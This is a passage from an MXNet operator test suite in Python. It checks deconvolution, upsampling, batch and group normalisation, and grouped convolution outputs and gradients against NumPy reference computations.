test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
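    # For the scalar variants the data gradient is the out-grad wherever the data wins
    # the comparison against the scalar, and zero otherwise.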
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
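    # Backward of nearest upsampling sums each upsampled block, so feeding the output back
    # as the out-grad scales every input element by the square of its total upsampling
    # factor (root_scale**2 * scale**(2*k) for argument k), which the loop below asserts.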
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
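    # Fill `arr` with the standard separable tent (bilinear interpolation) kernel for an
    # upsampling factor of f.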
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
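            # Hand-derived batch norm backward: dX is the data gradient, dW the gamma
            # gradient and db the beta gradient, accumulated below when grad_req is 'add'.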
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
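    # Note: np_groupnorm closes over `dshape`, which is defined further below before
    # these helpers are called.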
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
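# Grouped convolution should match slicing the input channels, convolving each group
# separately, and concatenating the results.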
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
